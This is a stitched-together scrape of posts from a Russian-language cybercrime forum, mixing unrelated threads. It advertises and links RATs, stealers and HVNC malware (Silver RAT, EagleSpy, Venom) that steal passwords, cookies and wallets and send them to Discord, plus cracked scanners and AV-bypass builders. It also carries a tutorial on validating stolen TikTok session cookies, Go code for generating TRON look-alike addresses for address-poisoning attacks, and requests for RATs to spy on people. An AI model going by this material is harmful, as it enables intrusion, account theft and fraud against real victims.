Видео "Перенаправляем трафик отдельного EXE-приложения в виртуальный сетевой интерфейс Tap":
Скачать: <http://ssh- tunnel.in/sshmanager/DoubleSSHTunnelManagerCommercial.exe>
Spoiler: 3 у вас 41
Первая - реконнектор. Данная софтина предназначена для реконнекта дедиков (поддержки их включенными) - это бывает нужно, т. к. многие дедики отключаются по таймауту, если на них ничего не делать, и соответственно запущенный на них Ваш софт отключается тоже, что не есть хорошо.
Вторая - прогрузчик.Это автоматический прогрузчик Ваших файлов на дедики. Копирует файлы в папку c:\intel, если ее нет на целевой машине - создает ее сам. Может прогрузить до 3 файлов каждый до 1 Мб размером. Первый файл из списка будет запущен после копирования всех файлов, это должен быть Ваш основной экзешник, два других файла - могут быть DLL или файлы настроек скачать.
p.s Да,запускайте их с каталога без пробелов и русских букв в полном пути, т. е. например c:\intel или d:\mysoft подойдут, а c:\моя папка\123 - не подойдет ...
Двух.Факторка - Да
Последняя авторизация - 2018-11-03T18:24Z
Страна - BR
=========
THE SIMS 4
MEDAL OF HONOR PACIFIC ASSAULT
FIFA 18
FIFA 15
==========<Good_Account>==========
Скачать:
You must have at least 5 reaction(s) to view the content.
Найденные вами баги будут в скором
исправлены
Связь:
Telegram - @Niteks3
Доброго времени суток, ув. комьюнити. Собственно сабж, подскажите актуальный,
бесплатный, кроссплатформенный (или хотя бы под окна) парсер почтовиков, с
поддержкой прокси и настраиваемым кол-вом потоков+выбор почтовиков, которые
парсить.
Заранее признателен.
Всем привет. Помогите с ответом, пожалуйста, может кто с опытных знает.
Задачка: существуют купоны на бензин к примеру, такого вида mr-oqdkKE, где
последние переменные 6 символов (могут быть либо цифры либо же буквы англ
любого регистра).
Есть ли смысл пробовать брутить?
The long-awaited release of the best browser for the darknet has arrived
you have to install TOR before running this
Enjoy guys
Download link:
https://mega.nz/file/ZB8RVQKK#ex1Mup5tY_s32TQ1gGzNQo5WX4hqu6M21qRzZcQAnBI
Windows:<https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.8.240828144-Windows-
Pwn3rzs-CyberArsenal.rar>
**
Linux:<https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.8.240828144-Linux-
Pwn3rzs-CyberArsenal.7z>
Password: Pwn3rzs**
PS. взято из телеграмм канала:https://t.me/Pwn3rzs
1. Install the iOS Unlocker with iphone-unlocker-x86.exe. Do not run it after
install.
2. After install is complete copy the patch files from Patch folder to
install folder (\Aiseesoft Studio\Aiseesoft iPhone Unlocker)
3. Run Unlocker.
--------------------[ Features]--------------------
Keylogger
Clipper
Screenshot
Stealer Files (Photos , Docs , TXT)
Download and Execute (Loader)
Get information Device [PC Name , Operating System , Firewall , Memory (RAM) ,
Anti Virus , Processor ]
Get location and address
Clear Cookies and Session from 20 Browsers like [ Google Chrome , Mozilla
Firefox , Opera , Yandex etc...]
Anti-Sandbox like [ wireshark , Process Hacker , TCPVIEW , virtualBox ,
sandboxie etc... ]
----------------[ WebPanel Features ]----------------
Reports , Screenshot ]
and info like [HWID , Country IP , Stat ( online or offline), Last Seen ]
from this page You can set a convenient time for you. You can also activate the file stealing a feature from the victim device
----------------[ Screenshots ]----------------
link download
Hidden content for authorized users.
https://github.com/moneermasoud/CosaNostra-HTTP-Botnet/
Use at your own risk . Use in virtual machine to test
You must have at least 5 reaction(s) to view the content.
New Security Checks
1. Put batch file in same folder as our release
2. Install Acunetix normally
3. Then run the bat to install the crack and license properly.Click to expand...
Всем привет! Подскажите хорошо работающий бэкдор для просмотра web камеры и прослушивания микрофона. Остальные функции не интересны, нужно только что-бы две эти хорошо работали с минимальным количеством глюков. Бесплатный или крякнутый, так как он нужно для разовой акции. Ну и что бы точно без склеек.
Что умеет данный буллет?
Он нужен для работы с вашими куки файлами.
В секции Cookies вы можете добавить папку с логами, пуля автоматически отыщет
все куки внутри всех логов.
При создании конфига вам нужно обязательно выбрать тип конфига:
После токго как вы создали конфиг с типом CookieEdition вам обязательно нужно
добавить блок работающий с куки. Он называется Cookie Container.
Что такое Cookie Container ?
Variable Name - это название переменной в которую будет помещена кука и в дальнейшем вы сможете с ней взаимодействовать.
Input string - строка в которую вы помещаете путь к куки файлу. Для этого нам
нужно прописать туда переменную
Domain - обязательное поле для заполнение, если вы хотите что бы все коректно работало. Это домен по которому будет искаться куки в файле с куками.
Save netscape? - если данная опция активна то в переменную (которую вы не
видите и не задаете)
Идем далее.
Как дебажить этот конфиг?
Необхоимо вместо Default указать СЕ формат и после чего указать путь к файлу с куками.
Пример как получить куки тиктока из файла:
Логичный вопрос назревает - И что дальше? Какой прок от этих кук?
А я вам отвечу - СОЗДАЕМ ГЕТ ЗАПРОС!
Но для начала я советую провалидировать куку, если вы это не сделаете то
кабзда!!!
Для вашего сервиса это может быть что-то инное, но для тиктока сомое важное в
куке это sessionid - если его нет то можно смело кидать куку в бед так как без
sessionid остальные куки тиктока не имею смысла.
Создаем гет запрос:
1 - Ссылка самого гет запроса.
2 - тип запроса в нашем случае это GET
3 - Наша переменная из блока Cookie Container котоая собрала все необходимые
куки из файла с доменом tiktok.com
4 - необходимые заголовки для запроса
Далее нам нужно провалидировать запрос:
Если запрос содержит usename или userid то наша кука валидна.
Если запрос содержит session_expiried то кука не валидна.
Валидная кука:
Не валидная:
Мне кажется вы уловили суть работы данной программы и теперь можете создавать
свои конфиги на различные сервисы. Я оставлю ссылку на проект ТикТока дабы
вы смогли подробнее изучить функционал.
Но я бы еще хотел рассказать суть переменной
С помощью этой переменной вы можете допустим сохранить валидную куку в формате
Netscape как это сделал я в своем проекте тик ток.
Результат работы нашего конфига:
Ну вот и все! Думаю кому то будет полезна эта программа для быстрого создания
конфигов на куки не зная языков программирования.
Теперь вам не нужно ждать выхода новой версии BLTools, вы можете создать свой
конфиг на абсолютно любой сервис.
Ссылочки:
You must have at least 1 reaction(s) to view the content.
Введение
Antipublic - Это инструмент для работы с вашими логами с помощью которого
можно сверять их на уникальность на таких системах как windows/linux.
Код на python и полностью открыт для вас. В качестве алгоритма шифрования
применяется xxhash128 из за своей скорости и удобства использования.
Во время разработки была поставлена цель сделать максимально простой и
дружелюбный к пользователю софт, но также понятный для разработчика.
Подготовка к работе
Краткая инструкция перед началом работы:
У вас должен быть установлен python 3.11.5, а также зависимости из файла
requirements.txt .
это можно сделать командой pip install -r requirements.txt .
1. Распакуйте архив.
2. Откройте config.py и настройте такие параметры как ap_file.
3. Запустите программу для демонстрации возможностей: python main.py -h
Для большего понимания работы советуется изучить readme.md файл в нем я
постарался описать все настройки и режимы работы.
Системные требования
Программа может работать на приближенно к минимальным требованиям python.
Для оптимальной работы желательно наличие NVME SSD и достаточного объёма
оперативной памяти.
Во встроенном режиме потребление памяти будет сильно выше.
Режимы работы
В программе есть три основных режима работы:
1. cli - это режим работы в командной строке с вводом из командной строки и
полным визуальным отображением результатов.
2. arg - этот режим работы позволяет передать путь к логам через аргумент а
также добавить tag к определенным логам и полным визуальным отображением
результатов.
3. embedded_mode - этот режим не предназначен для пользовательского
использования. Он создан для использования в стороннем ПО и удобного внедрения
его туда и не имеет отображений.
Начало работы
Для начала работы в cli режиме требуется просто выполнить подготовку к работе
и запустить программу:
python main.py
Ввести путь и ждать завершения
Для начала работы в arg режиме требуется просто выполнить подготовку к работе
и запустить программу:
python main.py -p путь к логам -t тег (( этот аргумент является опциональным)
заключение
В этом софте я хотел помочь людям которые постоянно работают с большим объёмом
логов и упростить их жизнь.
Этот проект был написан для улучшения своих навыков и надеюсь что мой проект
будет вам полезен.
Надеюсь на хорошую обратную связь.
Хочу всем пожелать хорошей работы!
Данные для сверки контрольной суммы архивов.
CRC-32 : F6412734 6559 байтов (6 KiB)
CRC-64 : 8D39044EAA2DC43F 6559 байтов (6 KiB)
SHA-1 : ff43545e15e3c40c47df82986dadd48e38096084 6559 байтов (6 KiB)
SHA-256 : bd57f9c56cd0a5b6bbe44484b0926ec61f611c8bc554e6e669a45bd2e3908f3c
6559 байтов (6 KiB)
BLAKE2sp : 616015ee09bf2996127d433c4a5b2a22e466ba5f0bfe78de8b7cd815f455eb91
6559 байтов (6 KiB)
txtUtils - мультитул для работы с текстовыми базами, включающий в себя 40 утилит, среди которых имеются самостоятельные функциональные программные обеспечения. Большинство инструментов имеют возможность обрабатывать файлы индивидуально и обрабатывать все файлы директории.
Для удобства эксплуатации было реализовано сохранение конфигураций программы. Конфигурации каждой утилиты индивидуальны, для сохранения настроек нажмите на зелёную кнопку, которая находится возле кнопки закрытия и сворачивания программы. Практически для каждого поля ввода расположения файла / директории задействовано свойство DragEnter (вы можете перенести файл или папку на них вместо того, чтобы искать файл или директорию в проводнике).
Spoiler: ОСНОВНЫЕ СКРИНШОТЫ
Вкладка "B" - "Binder":
Во вкладке "B " вы можете назначить стороннее часто используемое
программное обеспечение (до 10 штук) или директории (до 10 штук).
Настройка биндов программного обеспечения и директорий находится во вкладке
"S ". Быстро и удобно запускайте своё программное обеспечение из
txtUtils.
Вкладка "E" - "Executor":
Встроенный "Executor " для выполнения PowerShell-скриптов и VBS-скриптов
(batch временно отключены). Доступ к "Executor " осуществляется через
вкладку "E ". Не имеет консоли, предназначен только для быстрого
выполнения уже готовых скриптов, которые можно загружать из текстового файла.
Вкладка "S" - "Settings":
Удобные настройки во вкладке "S ". Во вкладке настроек вы можете включить
или отключить такие функции, как: открывать папку с результатом, звуковые
уведомления, логирование, создание файла readme.txt. Помимо этого вы можете
настроить бинды софтов, настроить бинды папок, сбросить все настройки, удалить
все результаты, открыть папку программы, открыть папку с результатами.
№ 1-10| № 11-20| № 21-30| № 31-40
---|---|---|---
[01] Нормализатор| [11] Разбить файл по N строк| [21] Удалить первые /
последние N строк| [31] Подсчёт количества строк, символов
[02] Silent Public in Private| [12] Объединить файлы директории| [22] Удалить
всё до / после указанного символа| [32] Удалить буквы из строк
[03] Anti Silent Public in Private| [13] Рандомизировать строки| [23] Удалить
первые / последние N символов| [33] Удалить цифры из строк
[04] Log Searcher| [14] Удалить дублирующиеся строки| [24] Удалить домены из
строк| [34] Удалить спецсимволы из строк
[05] Сравнить файлы| [15] Удалить пустые строки| [25] Получить всё до / после
указанного символа| [35] Генератор паролей
[06] Сортировщик доменов| [16] Удалить пробелы в строках| [26] Добавить текст
до / после указанного символа| [36] Генератор номеров телефонов
[07] Сортировщик паролей| [17] Конвертер кодировок| [27] Добавить текст в
начало / в конец строки| [37] Генератор ников по словарю
[08] Сортировщик хэшей| [18] Заменить текст в файлах| [28] Реверсирование
содержимого| [38] Генератор ФИО по словарю
[09] Fast(en/de)crypter - SafeBaseUploader| [19] Изменить регистр содержимого|
[29] Объединить через разделитель| [39] Генератор дат в диапазоне
[10] Сортировщик номеров| [20] Транслитерация / Смена раскладки| [30]
Перевернуть вокруг разделителя| [40] Генератор случайных чисел
Spoiler: СОДЕРЖИМОЕ ПАПКИ С ПРОГРАММОЙ
1. Папка 'resources'| В которой содержатся ресурсы и шаблоны для утилит,
которые могут редактироваться.
---|---
1.1. Папка '1_templates'| Шаблоны первой утилиты (Нормализатор), содержит
два файла:
1.1.1. Файл 'BadDomains.txt'| Файл с опечатками доменов, каждый с новой
строки, вы можете их заменить или добавить свои с новой строки.
1.1.2. Файл 'GoodDomains.txt'| Файл с исправленными доменами, каждый с новой
строки, вы можете заменить их или добавить свои с новой строки.
1.2. Папка '4_templates'| Шаблоны 4 утилиты (Log Searcher), содержит файлы
с регулярными выражениями, вы можете их заменить своими.
1.3. Папка '6_templates'| Шаблоны 6 утилиты (Domain Dorter), содержит
файлы со списками доменов, разделённых через пробел, вы можете их заменить или
добавить свои в той же строке через пробел.
1.4. Папка '8_templates'| Шаблоны 8 утилиты (Сортировщик хэшей), содержит
файлы с регулярными выражениями хэшей, вы можете их заменить своими или
создать новые файлы с дополнительным регулярным выражением в файле. Учтите,
количество шаблонов влияет на скорость выполнения.
1.5. Папка '10_templates'| Шаблоны 10 утилиты (Сортировщик номеров),
содержит файлы с кодами стран и операторов, вы можете их заменить своими или
создать новые файлы с кодами стран и операторов в файле. Учтите, количество
шаблонов влияет на скорость выполнения.
1.6. Папка '37_templates'| Шаблоны 37 утилиты (Генератор ников по
словарю), содержит два файла:
1.6.1. Файл 'nicks_1.txt'| Шаблоны первой половины генерируемых ник-неймов.
1.6.2. Файл 'nicks_2.txt'| Шаблоны второй половины генерируемых ник-неймов.
1.7. Папка '38_templates'| Шаблоны 38 утилиты (Генератор ФИО по словарю),
содержит 3 файла:
1.7.1. Файл 'names.txt'| Шаблоны имён для генерации ФИО.
1.7.2. Файл 'surnames.txt'| Шаблоны фамилий для генерации ФИО.
1.7.3. Файл 'patronymics.txt'| Шаблоны отчеств для генерации ФИО. Списки
должны иметь имена, фамилии и отчества одного пола.
|
2. Папка 'results'| Содержит результаты выполнения программы. Внутри неё
создаются папки с именем в формате 'Result [2024-01-02] [00-11-22] - [1]':
| - [2024-01-02] - дата создания результата (год, месяц, число);
| - [00-11-22] - время создания результата (часы, минуты, секунды);
| - [1] - номер утилиты, которой было произведено действие над исходным
файлом или директорией.
|
3. Папка 'settings'| Содержит настройки, которые могут редактироваться
непосредственно из программы или вручную. Лучше не прибегать к ручному
редактированию настроек.
3.1. Папка 'binds'| Содержит данные о биндах (вкладка 'B') ваших
директорий (b_folders.txt) и сторонних программных обеспечений
(b_softwares.txt), которые вы используете.
3.2. Папка 'configs'| Содержит сохранённые конфигурации встроенных утилит,
такие как путь к исходному файлу, путь к исходной директории, символ
разделителя, числовые значения различных параметров и так далее. Файлы папки
'configs' имеют формат '777_cfg.txt', где '777' - это номер утилиты, которой
соответствует данный конфиг.
3.3. Папка 'logs'| Содержит файл с логами (log.txt), вы можете в любой
момент узнать, какое последнее действие вы совершили или узнать ошибку, если
такая возникла при выполнении программы. Логирование можно отключить
опционально во вкладке 'S' -> '[03] Логирование'.
3.4. Файл 'general_settings.txt'| Основные настройки программы, которые
редактируются через вкладку 'S'.
|
4. Папка 'softwares'| Директория, в которую вы можете поместить часто
используемое программное обеспечение. Не забудьте добавить его в бинды
(вкладка 'B') для быстрого запуска.
5. Папка 'tmp'| Временная директория, не редактируйте файлы и не удаляйте
их во время работы программного обеспечения.
6. Файл 'ReadMe.txt'| Полезная информация, почитайте.
7. Исполняемый файл 'txtUtils_Sharpener.exe'| Лучший выбор программного
обеспечения на каждый день.
Программное обеспечение имеет интуитивно понятный интерфейс, но имеются моменты, касающиеся настроек и эксплуатации, с которыми желательно ознакомиться перед эксплуатацией. Если вы потратите 30-60 минут своего времени на то, чтобы ознакомиться с инструкциями и протестировать программное обеспечение, то у вас будет незаменимый помощник на каждый день. Ниже предоставлен список с необходимыми инструкциями:
0. Список всех инструкций - читать...
1. Общая инструкция - читать...
2. Настройки - читать...
3. Сохранение конфигураций - читать...
4. Логирование - читать...
5. Биндер софтов и папок - читать...
6. Executor - читать...
7. Регулярные выражения - читать...
8. Нормализатор - читать...
9. Silent Public in Private - читать...
10. Anti Silent Public in Private -
читать...
11. Log Searcher - читать...
12. Сортировщик доменов - читать...
13. Сортировщик паролей - читать...
14. Сортировщик хэшей - читать...
15. Сортировщик номеров - читать...
16. Конвертер кодировок - читать...
Актуальные инструкции вы сможете найти в телеграм-канале txtUtils Manuals (кликабельно)
Следите за обновлениями программного обеспечения в Telegram-канале txtUtils
News (кликабельно).
Вы, как и все пользователи, можете напрямую влиять на обновления программного
обеспечения.
Если у вас возникли дополнительные вопросы или предложения по улучшению
программного обеспечения, то вы можете написать в поддержку txtUtils
Support (кликабельно).
Поддержку пользователей, обновления и всё, что связано с txtUtils
осуществляю я, чтобы его разгрузить меня, был создан Telegram-чат txtUtils
Chat (кликабельно).
Вступайте в телеграм-чат и делитесь опытом использования программного
обеспечения. В идеале, вы можете там группой обсудить обновление существующей
утилиты или создание новой так, чтобы это было удобно для всех. А потом уже
один человек напишет мне или отметят меня в чате. Сразу скажу, что чат не для
рассылок, не для рекламы и прочего. Всё, что будет его захламлять - будет
баниться.
Программное обеспечение является абсолютно бесплатным, последующие обновления будут тоже бесплатны. Цель - с вашей помощью создать, если не идеальный, то близкий к идеалу инструмент для обработки текстовых данных. Вы можете поддержать проект, это только приветствуется. Внутри софта реализована неназойливая система баннеров и объявлений для тех, кто поддержал проект. Подробнее об этом сможете прочитать в Telegram-канале txtUtils News (кликабельно). Также внутри софта реализована безопасная система сбора статистики. Автоматических обновлений в программном обеспечении нет и не будет!
Будьте осторожны при скачивании программного обеспечения на сторонних ресурсах
и в темах с другим автором.
Автоматических обновлений в программном обеспечении нет и не будет!
Найти и скачать актуальную версию вы всегда сможете в телеграм-канале с
обновлениями - https://t.me/txtutils
Автоматических обновлений в программном обеспечении нет и не будет!
По возможности буду стараться обновлять ссылки здесь, но не обещаю.
Spoiler: Скачать / Download [RUS]
DOWNLOAD:
[RUS] [AnonymFile](https://anonymfile.com/r1L0q/rus-txtutils-sharpener-
ver002.rar) –
VirusTotal
[ENG] [AnonymFile](https://anonymfile.com/kW5K5/eng-txtutils-sharpener-
ver002.rar) –
VirusTotal
VIRUSTOTAL:
[RUS] VirusTotal
архива
[ENG] VirusTotal
archive
Spoiler: Скачать / Download [ENG]
DOWNLOAD:
[RUS] [AnonymFile](https://anonymfile.com/r1L0q/rus-txtutils-sharpener-
ver002.rar) –
VirusTotal
[ENG] [AnonymFile](https://anonymfile.com/kW5K5/eng-txtutils-sharpener-
ver002.rar) –
VirusTotal
VIRUSTOTAL:
[RUS] VirusTotal
архива
[ENG] VirusTotal
archive
**Всем привет.
Я ищу ратник для андроида.
Попробую скрывать его под др прила. Круто если уже так.
Хочу хакнуть противника отправляя ему это прилу.
Спасибо.**
Доброго дня! Ищу ратник под андроид, не интересует бесплатный мусор, типо
кряка spynote и spymax
Цена не важна
Хочется увидеть действительно годный продукт с большим функционалом, который
будет хорошо криптоваться.
Кто что может посоветовать ссылаясь на официальные ветки продаж?
Есть компания(свая) нужно следить за сотрудниками что делают что говорят, по типу njrat только новый и без склеек, спасибо
ОТКРЫВАТЬ ТОЛЬКО НА ВИРТУАЛКЕ ИЛИ ДЕДИКЕ, А ТАМ УЖЕ КАК ПОЖЕЛАЕТЕ
![dropmefiles.com](/proxy.php?image=https%3A%2F%2Fdropmefiles.com%2Fimages%2Fshare- logo_vk.png&hash=3f67b87028329be58fe8d4c73ccac7b9&return_error=1)
](https://dropmefiles.com/Fi2yM)
Share your pictures, send large videos, exchange music or transfer big files. No registration required. Unlimited upload/download speed.
dropmefiles.com
Доброй ночи, ищу брутер rdp узлов если есть что то на примете поделитесь внизу ветки пожалуйста.
!!!ДИСКЛЕЙМЕР ,Я НЕ ПРЕТЕНДУЮ НА ЛУЧШИЙ СОФТ ИЛИ ЧТО ТО ПОДОБНОЕ!!!
(Special for XSS forum)
Шалом всем ,сегодня хочу представить свой софт парсинга ссылок по вашим
доркам.
Большая часть из нас пользуется сканерами уязвимостей в частности
окунем(Acunetix) , и все мы видели что можно сделать масс скан если загружать
линки в .csv формате, так вот мой софт может сделать выхлоп сразу в такой файл
который вы можете загрузить в окуня.Ведь бывает очень в падлу просто
копировать ссылки и вставлять в файл, так вот этот софт облегчит эту задачу.
Инструкция по пользованию:
1.Создайте файл file.txt в директории с софтом в него надо будет загрузить дорки
2.Создайте файл http.csv в директории с софтом в него загрузятся все ваши ссылки по вашему дорку(Дорки можно сделать через https://dorkgpt.com/)
Python:Copy to clipboard
#Special for XSS forum
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from colorama import Fore
def gogle_parser():
pa = '''
░██████╗░░█████╗░░█████╗░██████╗░░█████╗░██████╗░██╗░░██╗
██╔════╝░██╔══██╗██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║░██╔╝
██║░░██╗░██║░░██║██║░░██║██║░░██║██║░░██║██████╔╝█████═╝░
██║░░╚██╗██║░░██║██║░░██║██║░░██║██║░░██║██╔══██╗██╔═██╗░
╚██████╔╝╚█████╔╝╚█████╔╝██████╔╝╚█████╔╝██║░░██║██║░╚██╗
░╚═════╝░░╚════╝░░╚════╝░╚═════╝░░╚════╝░╚═╝░░╚═╝╚═╝░░╚═╝ by k0priz for XSS'''
content = []
file1 = open("file.txt", "r")
while True:
# считываем строку
line = file1.readline()
# прерываем цикл, если строка пустая
if not line:
break
content.append(line.strip())
dork = len(content)
print(pa)
print(Fore.GREEN + 'Загрженно дорков', len(content))
a = int(input(Fore.WHITE + 'Какой дорк будем использовать?: '))
# проверяем наличие строки
if a > dork:
print(Fore.RED + 'Такого дорка нету, повторите попытку')
elif a <= dork:
print(Fore.GREEN + f'Используется дорк {content[a]}')
query = content[a]
# закрываем файл
file1.close()
# Запускаем Chrome WebDriver
driver = webdriver.Chrome()
# Переходим на страницу поиска Google
driver.get("https://www.google.com")
# Находим поле поиска и вводим запрос
search_box = driver.find_element_by_name("q")
search_box.send_keys(query)
search_box.send_keys(Keys.RETURN)
time.sleep(2) # Даем время для загрузки страницы
# Находим все ссылки на странице
links = driver.find_elements_by_css_selector('a')
# открываем файл .csv
with open('http.csv', 'a') as csvfile:
for i, link in enumerate(links):
href = link.get_attribute("href")
# Проверяем, что ссылка не пуста и начинается с "http" или "www"
if href and (href.startswith("http") or href.startswith("www")):
# Проверяем, что ссылка не содержит "google.com"
if 'google.com' not in href:
csvfile.write(href + '\n')
# Закрываем браузер
driver.quit()
else:
print('Ошибка')
if __name__ == '__main__':
gogle_parser()
Конструктивная критика принимается , и если есть пожелания что то добавить то
пишите сделаю вторую версию этого софта.
Всем хорошего дня, выражаю соболезования всем семья пострадавших и погибших
из-за вчерашних событий в Мск.Берегите себя.
Накатал чекер сид фраз btc на баланс
Проверяет адреса стандартов BIP32, BIP44, BIP49, BIP84, BIP141 с индексом 0
Если выходят пустышки, значит есть транзакции и такие сидки лучше вручную
перепроверять, т.к. я не делал проверку следующих адресов в иерархии
Для проверки баланса используются ноды Электрума
Сурсы - https://www.sendspace.com/file/2pn3rw
Скомпилинный модуль - https://www.sendspace.com/file/8djus7
Приветствую всех!
Я активно изучаю OpenBullet и хотел бы углубить свои знания по этому инструменту. В данный момент я ищу информацию для более глубокого освоения OpenBullet и был бы очень благодарен, если кто-то мог бы помочь мне в этом процессе. Так-же если кто-то тоже начинает изучение, буду рад скооперироваться и обмениваться информацией!
Если у вас есть полезные ресурсы, статьи, или вы можете порекомендовать какие- то русскоязычные чаты или сообщества, связанные с OpenBullet, буду очень признателен за ваши рекомендации.
Также, если кто-то готов поделиться опытом и наставить меня в использовании OpenBullet, буду рад вашему сотрудничеству!
Заранее спасибо!
Телеграмм в личные сообщения.
http://damaga377vyvydeqeuigxvl6g5sbmipoxb5nne6gpj3sisbnslbhvrqd.onion/git/swagcat228/qafel.git
Собсно говоря.
В виду критической нагрузки и систематической нехватки времени - если кому-то
будет интересно и/или будут возникать вопросы, (а если первое условие истинно,
то вопросы возникать будут) - милости прошу в ишьюсы, по возможности всем
отвечу.
PR так же приветствуются.
Это программное обеспечение предназначено для обхода систем Deep Packet Inspection, установленных у многих интернет-провайдеров, которые блокируют доступ к определенным веб-сайтам.
Она обрабатывает DPI, подключенные с помощью оптического разветвителя или зеркалирования портов (Passive DPI), которые не блокируют данные, а просто отвечают быстрее, чем запрашиваемое место назначения, и Active DPI, подключенные последовательно.
Требуется Windows 7, 8, 8.1, 10 или 11 с правами администратора.
circumvention utility (for Windows) ](https://github.com/ValdikSS/GoodbyeDPI)
GoodbyeDPI — Deep Packet Inspection circumvention utility (for Windows) - ValdikSS/GoodbyeDPI
github.com
Есть очень много баз с почт мне нужен именно тот который войдет в почту и проверит на запрос если там такой запрос есть то чтобы показывала валид
Original EagleSpy Android RAT Complete Source Code Leak Free For Everyone Who
Wants
Download:
EagleSpy Source
Code
Silver RAT v1.0
It is the best Remote administration tool of 2023 which has many unique
features
We never neglect or let our product die It is updated all the time. We have
good ideas and future updates.
Stub: The default size is 35 KB And it depends Based on your choice of
features. The more features you choose,
the higher the base payload size.
Features
️
Hidden RDP
️
Hidden VNC
️
Hidden Apps
️
Hidden Browaser
️
Hidden Process
️
Hidden Installation
️
Cryptocurrency monitor
Password stealer
Get
you all data and passwords as follows
Browsers + cookies
Apps
Gaming
Bank cards
Market
Cryptocurrency wallets
WIFI
System
Send all data to Discord
If you enable this feature Once the client clicks on the payload All client data will be listed Such as Get you all data and passwords as follows
And you compile it into a zip file with a password And it sends you a download link to your Discord account And It tells you whether this client is new or you already have it
Additional attachments
️
Stub Private / FUD
It
will take two days or less for Stub Private to be programmed and sent to you
by email automatically
️
BypassAV / FUD
️ Exploit Macro Builder | Doc & Docx & Xlsm & vbs & JS
️ Bypass WD Builder | Add exceptions
️
Binder
![send.exploit.in](/proxy.php?image=https%3A%2F%2Fsend.exploit.in%2Fsend- fb.358d4b57.jpg&hash=824ffe54bac782fbc1c2b7f04639d4b7&return_error=1)
](https://send.exploit.in/download/a772138d01906544/#DrwBLki80Zf1Vf7qw3P12w)
Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.
send.exploit.in
Password Download Link : xssis
RAR password : xss.is
Enjoy!
Cracked .NET HVNC rat not by me. Always use a vm)
Spoiler: Download
](https://anonfiles.com/D6w90fx9za/Venom_RAT_HVNC_Stealer_Grabber_v6_0_3_zip)
anonfiles.com
https://send.exploit.in/download/*
Spoiler: Scan
](https://www.virustotal.com/gui/file/7331368c01b2a16bda0f013f376a039e6aeb4cb2dd8b0c2afc7ca208fb544c58)
VirusTotal
www.virustotal.com
[ https://analyze.intezer.com/analyses/1c5d11e9-8560-409f-9483-1c92419c9446/genetic- analysis ](https://analyze.intezer.com/analyses/1c5d11e9-8560-409f-9483-1c92419c9446/genetic- analysis)
К своему сожалению, имел неосторожность отправть N-ую сумму на идентичный
моему получателю кошелек. Как в этом треде - https://xss.is/threads/82463/
Вашему вниманию, Golang скрипт для генерации адресов в сети TRON
1. Поиск по первым символам (pKey:
524f8fd83cb54259a4209d178abe686bf45eef77b92a8956439f34d178b0669f, address:
TXSSemgwBZVb5SHZTYZ6XVVBWS688MTomF)
2. Поиск по последним символам (pKey:
b8ae5661b8d1f8bf5de9beff97b27c81a7323190c41e2b2a8cf22b575d328f63, address:
TRkgSp7xGzopgraWqiLdXwfRnQhqhFbXSS)
3. Поиск по первым и последним символам (см. спойлер)
4. Поиск по последовательности символов (pKey:
2c9e13aa731a04ac2caca775f01c045a999ce9dfb0fa174fa308d258541f3b95, address:
TTvwsCKNDSg4zE6tQAv5iZBgv2y1XSSisF)
Данные адреса можно использовать в аналогичных атаках
Если будете генерировать какой-либо красивый кошелек для себя (например
начинающийся с 5 символов T), - не забывайте про мультиподпись.
- Кошельки начинающиеся более чем с 5 символов T подсвечены
- Вывод скорости генераций
Spoiler: sample
Spoiler: Golang Code
Code:Copy to clipboard
package main
import (
"crypto/ecdsa"
"crypto/sha256"
"encoding/hex"
"errors"
"fmt"
"strings"
"time"
"github.com/ethereum/go-ethereum/common/hexutil"
"github.com/ethereum/go-ethereum/crypto"
"github.com/fatih/color"
"github.com/mr-tron/base58"
)
type key struct {
privateKey string
publicKey string
addressHex string
addressBase58 string
attempts int
numT int
}
func main() {
var searchOption int
fmt.Println("█████████████████████████████████████████████████████████")
fmt.Println("█─▄─▄─█▄─▄▄▀█▄─▀─▄███▄─█─▄██▀▄─██▄─▀█▄─▄█▄─▄█─▄─▄─█▄─█─▄█")
fmt.Println("███─████─▄─▄██▀─▀█████▄▀▄███─▀─███─█▄▀─███─████─████▄─▄██")
fmt.Println("▀▀▄▄▄▀▀▄▄▀▄▄▀▄▄█▄▄▀▀▀▀▀▄▀▀▀▄▄▀▄▄▀▄▄▄▀▀▄▄▀▄▄▄▀▀▄▄▄▀▀▀▄▄▄▀▀")
fmt.Println("")
fmt.Printf("Wallets starting with more than 5 characters \033[32mT\033[0m are \033[32mhighlighted\033[0m\n")
fmt.Println("The generation rate is output every 5 minutes")
fmt.Println("")
fmt.Println("Choose search option:")
fmt.Println("1. Search by first characters")
fmt.Println("2. Search by last characters")
fmt.Println("3. Search by both first and last characters")
fmt.Println("4. Search by any sequence of letters or numbers")
fmt.Print("Enter the option number: ")
fmt.Scan(&searchOption)
var firstCharacters, lastCharacters, sequence string
switch searchOption {
case 1:
fmt.Print("Enter the first characters to search: ")
fmt.Scan(&firstCharacters)
case 2:
fmt.Print("Enter the last characters to search: ")
fmt.Scan(&lastCharacters)
case 3:
fmt.Print("Enter the first characters to search: ")
fmt.Scan(&firstCharacters)
fmt.Print("Enter the last characters to search: ")
fmt.Scan(&lastCharacters)
case 4:
fmt.Print("Enter any sequence of letters or numbers to search: ")
fmt.Scan(&sequence)
default:
fmt.Println("Invalid option")
return
}
addressChannel := make(chan *key)
attemptsChannel := make(chan int, 100)
go func() {
ticker := time.NewTicker(time.Duration(5 * time.Minute))
var attempts int
for {
select {
case <-ticker.C:
fmt.Printf("speed: %d\n", attempts)
attempts = 0
case <-attemptsChannel:
attempts++
}
}
}()
for i := 0; i < 255; i++ {
go func() {
attempts := 1
for {
k, err := generateKey(attempts)
if err != nil {
fmt.Println(err)
return
}
if matchesPattern(k.addressBase58, searchOption, firstCharacters, lastCharacters, sequence) {
addressChannel <- k
attemptsChannel <- 1
return
}
attemptsChannel <- 1
attempts++
}
}()
}
for i := 0; i < 255; i++ {
select {
case k := <-addressChannel:
var numTColor, addressColor string
switch {
case k.numT <= 5:
numTColor = color.WhiteString("%d", k.numT)
addressColor = k.addressBase58
case k.numT == 6:
numTColor = color.GreenString("%d", k.numT)
addressColor = color.GreenString(k.addressBase58)
case k.numT >= 7:
numTColor = color.RedString("%d", k.numT)
addressColor = color.RedString(k.addressBase58)
}
fmt.Printf("attempts: %d, tNum: %s, pKey: %s, address: %s\n", k.attempts, numTColor, k.privateKey, addressColor)
}
}
}
